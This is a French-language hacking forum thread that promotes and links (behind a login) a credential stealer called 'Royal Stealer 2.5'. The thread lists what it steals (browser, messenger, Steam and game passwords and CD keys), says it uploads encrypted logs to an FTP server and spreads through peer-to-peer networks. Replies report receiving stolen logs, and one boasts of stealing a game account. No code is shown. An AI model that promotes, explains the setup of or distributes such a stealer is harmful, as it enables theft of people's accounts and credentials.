....

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

agno

Membre Banni
Dec 9, 2010
7
0
421
28
Royal Stealer 2.5 Fix


News !

Steal Fixé sur AnkamaShield !
Fonctionne sur windows 7 toutes éditions
Steal Steam
Steal Opera
Steal Google Chrome

et pleins d'autres nouveautés !! :)



royal-stealer.jpg



Came la nouvelle version de la Royal Stealer 2, développé par un programmeur Stealer espagnol. Contrairement à sa précédente version Royal Stealer, ce qui soulève les logs vers un serveur FTP, ce qui évite l’utilisation de comptes de messagerie.

Également ajouté la possibilité de propagation de Stealer par Ares et Emule et vous permet de choisir où sauvegarder le Stealer pour démarrer avec des fenêtres, cette option n’est pas toujours très recommandé, car qui ne fait que remplir le serveur FTP .

Le Royal 2.5 Stealer journaux ou envoyer le mot de passe suivant:

Dofus
MSN messenger, Live messenger.
Firefox
Internet Explorer
Jeu CD-Keys
CD-Keys de Logiciels et de jeux
No-Ip
Steam
Google Chrome
Opera
...
ect

Les journaux sont également envoyées cryptées, il est donc nécessaire d’utiliser le visualiseur de l’onglet du journal de l’outil pour les voir. Les unités ont été ajoutées à la téléchargements nécessaires à l’exploitation sur n’importe quel ordinateur.



Scan : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!


Lien : Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!
 

Silverre

Membre
Oct 31, 2011
27
0
306
29
Je le cherchez mais je ne le trouvez pas merci bien :D Je test sur MV ! Je vous dit quoi :)

---------- Message ajouté à 00h04 ---------- Le message précédent était à 00h03 ----------

P.S. Le logiciel se lance j'ai configurer mon server et j'ai test . J'ai reçu les logs , parfait +1 , j'espere que steam compatible !
 

agno

Membre Banni
Dec 9, 2010
7
0
421
28
Demain dans la journée : nouvelle version annoncé par les codeurs, je la posterais au plus vite =)
Steam et d'autres clé de jeux vont être ajoutés !
 

pad59130

Membre Banni
Nov 25, 2011
6
0
561
Oui je suis d'accord avec alexoxido , C'est pas trés claire , cela sert a quoi ? j'ai juste bien aimé , j'ai voler un comte Stuff AA =) =) =)
 

Silverre

Membre
Oct 31, 2011
27
0
306
29
Moi il marche parfaitement , je l'ai lancer en tant que administrteur et aucun problème je suis sous vista . J'attend avec impatience la maj
 

alex78alex

Membre
May 11, 2011
69
0
426
Salut,

comme beaucoup se le demande, comment cela marche ? Ile me semble que c'est pour "hacker" mais pourrions nous avoir un "tuto" ?

Mercin d'avance

Cordialement
 

Silverre

Membre
Oct 31, 2011
27
0
306
29
J'attend la Maj avec impatience et je lui parle skype il me dit que Windows 7 seras compatible :D
 

LoverToolz

Membre actif
Sep 29, 2011
219
0
321
Les noobs que vous avez eu...
Incroyable...
La connerie ou la naïveté est incroyable, je suis choqué, ils regardent même pas les messages des gens du topic quoi --"
 

Silverre

Membre
Oct 31, 2011
27
0
306
29
LoverToolz de quoi tu parle c'est pas sa faute si il ne savent pas utiliser un Stealer
 

LoverToolz

Membre actif
Sep 29, 2011
219
0
321
Je suis sûr que je te connais, mais j'arrive pas à savoir qui ...
Braiffe, je te laisse faire ton partage :D
 

Zacky

Membre actif
Jan 22, 2011
104
0
441
LoVerToolz Ne fait pas ton professionnel tu t'es fait avoir par un trojan du Serveur privé 2.0 Donc je ne pense pas que tu puisse être plus intelligents ...